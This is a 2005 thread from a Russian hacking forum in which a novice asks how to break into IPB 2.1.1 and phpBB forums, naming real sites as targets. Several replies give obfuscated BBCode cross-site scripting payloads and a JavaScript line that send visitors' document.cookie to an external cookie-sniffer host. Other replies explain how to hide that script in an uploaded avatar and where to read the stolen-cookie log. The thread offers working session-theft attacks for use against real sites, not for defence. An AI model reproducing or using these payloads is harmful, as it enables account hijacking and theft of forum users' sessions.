Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Ipb 2.1.1 (https://forum.antichat.xyz/showthread.php?t=11424)

Dimazzz 06.12.2005 23:14

Ipb 2.1.1
 
Кто может четко и внятно разъяснить мне неопытному как проникнуть в админку или взломать этот форум IPB 2.1.1, только поочереди что и как нужно делать.
Заранее спасибо ;))

на примере возьмите
http://steeld.ru/forum/index.php

Tem 06.12.2005 23:25

Ну форум пропачен, с эксплоитом не доберёшся, а Xss тама активна.

Rex@ 07.12.2005 01:33

Ну а можно вообще сказать как юзать(взламавыть)
ipb версии 2.1.1??
Типа какая уязвимсоть -как ее использовать!
И дайте пожалуста ссылку на эксплойт для версии 2.1.1 -если он конечно есть??

ghostwizard 07.12.2005 01:42

Код HTML:

[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]        [/topic]]
[/post]


Maniak 07.12.2005 11:18

Да ну ты и поставил зачиту от дураков... Не чего не получанется.

Dimazzz 07.12.2005 19:41

У а как на счет этого http://lilania.ru/board/

На старом хосте сидели я их ломанул а щас чет немогу.

D1mOn 07.12.2005 19:42

звёздочки поубирай

Dimazzz 07.12.2005 19:44

Цитата:

Сообщение от D1mOn
звёздочки поубирай

гы.... Какие?

FQziT 07.12.2005 19:58

Цитата:

гы.... Какие?
Я так полагаю это он сказал не тебе. Звездочки надо в коде поубирать, который дал ghostwizard

Azazel 07.12.2005 20:00

Цитата:

Сообщение от Dimazzz
гы.... Какие?

Ну если даже звёздочек нету, попробуй так: http://forum.antichat.ru/showthread.php?t=9910

Tem 07.12.2005 20:01

Да в коде котором поставил ghostwizard.Не ужели так трудно понять.

FQziT 07.12.2005 20:02

Цитата:

У а как на счет этого http://lilania.ru/board/
Это не в тему, т.к. это имхо вообще не IPB=)

Dimazzz 07.12.2005 20:02

Цитата:

Сообщение от Azazel
Ну если даже звёздочек нету, попробуй так: http://forum.antichat.ru/showthread.php?t=9910

тоесть вот эта статья поможет мне с форумом
www.lilania.ru

D1mOn 07.12.2005 20:02

Привильно ЯЯЯ =)))

Dimazzz 07.12.2005 20:03

Цитата:

Сообщение от <<YaYaYa>>
Это не в тему, т.к. это имхо вообще не IPB=)

Это я понимаю но про форум www.lilania.ru
можите что нить подсказать?

Azazel 07.12.2005 20:09

Да, должна помочь. Твой форум на phpBB. Используй поиск и не флудь темку про IPB.

FQziT 07.12.2005 20:10

Dimazzz да ясно, что это phpbb=))) пробуй xss для phpbb 2.0.15 >
и хорош флудить тута-))

Dimazzz 07.12.2005 20:18

И еще один момент дайте сслылку на снифер ))

Dimazzz 07.12.2005 20:22

Цитата:

Сообщение от <<YaYaYa>>
Dimazzz да ясно, что это phpbb=))) пробуй xss для phpbb 2.0.15 >
и хорош флудить тута-))

Дай ссылочку )

FQziT 07.12.2005 20:23

В каком смысле?=)))
http://antichat.ru/sniff/ - вот сюда зайди там всё расписано=)
репу мне!=)) я помог)


Цитата:

Дай ссылочку )
пользуйся ПОИСКОМ ПО ФОРУМУ! там тебе полно ссылочек будет-))

код сниффера для phpbb 2.0.18:
Код HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
уберешь тока "+" из спец сомловов
репу мнееее=)))
СОРРИ ЗА ФЛУД! Просто я помогаю парню=)

Azazel 07.12.2005 20:28

http://antichat.ru/sniff/ + Перечитай мой предидущий пост.

Dimazzz 07.12.2005 20:33

Я вот что то непойму ))
вот в этой статье:
http://forum.antichat.ru/showthread.php?t=9910

<body onloаd="javаscript:document.locatiоn.replаce(' http://www.АДРЕС_ЯКОБЫ_ВЗЛОМАННОГО_ АЙТА.narod.ru/index.htm')">
<script language="JavаScript">
img = nеw Imаge(); img.srс = "http://АДРЕС_СНИФЕРА.ru/snifer.php?"+document.cookie;
</script>

адрес якобы взломанного сайта - это должен быть сайт который я на народе создал???
адрес снифера?? - что туда нужно записать

D1mOn 07.12.2005 20:38

оооооооооооооооо боже.....

Dimazzz 07.12.2005 20:40

мдя ... ну что поделать
я вот непойму какой адрес снифера написать???
Кто поможет напишите эту строчку правильно ))

FQziT 07.12.2005 20:42

И Я И Azazel УЖЕ ТЕБЕ ГОВОРИЛИ!!!! ЗАЙДИ НА http://antichat.ru/sniff/
ну если после этого не поймешь, что нужно в "адрес снифера" писать, то я не знаю......

напиши там http://antichat.ru/cgi-bin/s.jpg?
и потом иди смотреть лог сниффера по адресу http://antichat.ru/sniff/log.php

что не понятно????

D1mOn 07.12.2005 20:43

img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

Dimazzz 07.12.2005 20:45

<body onloаd="javаscript:document.locatiоn.replаce(' http://www.АДРЕС_ЯКОБЫ_ВЗЛОМАННОГО_ АЙТА.narod.ru/index.htm')">
<script language="JavаScript">
img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg/snifer.php?"+document.cookie;
</script>

мля ... но недоганю млин , так чтоль ))
ну этож неправильно вроде, напишите как нуно.

Dimazzz 07.12.2005 20:46

Цитата:

Сообщение от D1mOn
img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

Наконец таки ))
Так буду дальше мучаться :))

Dimazzz 07.12.2005 20:52

хм ... сохранил я этот код и переменовал в .gif но на сате ругается и не загружает мой аватар??? В чем тут ошибка??

D1mOn 07.12.2005 20:56

Делай так:
Открывай блокнот. Забивай туда <script>img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Нажимай "сохранить как" и сохраняй как avatar.jpg. Теперь загружай на форум её, и делай что хотел делать. И не забудь + к моей репе =))

Tem 07.12.2005 20:58

Бля не меняей нечего , как тебе сказали так и делай , так трудна чтоли, вот всё как есть как тебе изложили так и делай всё.

Dimazzz 07.12.2005 21:19

Чета все сделал как наптсано в той статье и ни какого эффекта ((
Если есть у кого нить эта аватарка и 2 html файла скиньте пожадуйста

Dimazzz 07.12.2005 21:21

или дайте мыло я скину эти файлы а вы проверите все правильно я сделал или нет ;) этож не так сложно.

D1mOn 07.12.2005 21:25

vzlom_dima@mail.ru

Dimazzz 07.12.2005 21:35

Цитата:

Сообщение от D1mOn

Проверь отослал ))



И может кто нить скинет мне мыло готовые эти файлы??

pro100diavolenok@xaker.ru

FQziT 07.12.2005 21:47

Dimazzz по-моему в статье ЯСНО написано, что да как! Если не получается, то пробуй сначала, ещё раз почитай. НО там всё написано! Вопросов быть не должно.
censored!'у респект! Он объяснил так, что не понять не может просто никто! Это пошаговая инструкция....=)

Dimazzz 07.12.2005 21:51

Инструкция то пошаговая, просто может я в чем та ошибся и невижу этого ((
Если у тебя есть все это можеш мне скинуть??

FQziT 07.12.2005 22:08

У тебя сайт на народе есть? Если есть, то ДЕЛАЙ ВСЁ КАК В СТАТЬЕ!!! ТАМ И ТАК ВСЕ ГОТОВОЕ!!!!
зы совет: создай для этого обсуждения новую тему, т.к. это уже идет полнейший флуд и не имеет ни какого отношения к форумам Ipb 2.1.1.

Dimazzz 07.12.2005 22:09

Цитата:

Так мы и рассматривам взлом Ipb с помощью данной статьи ))
Я ведь сказал уже что ты рассматриваешь.
Тема закрыта из-за невнимания автора к ответам на его вопросы.

*Van* 07.12.2005 22:46

Короче смотри видео есть. phpnuke от Мишки. Найдешь в разделе видео. В ипб аналогично.


Время: 13:16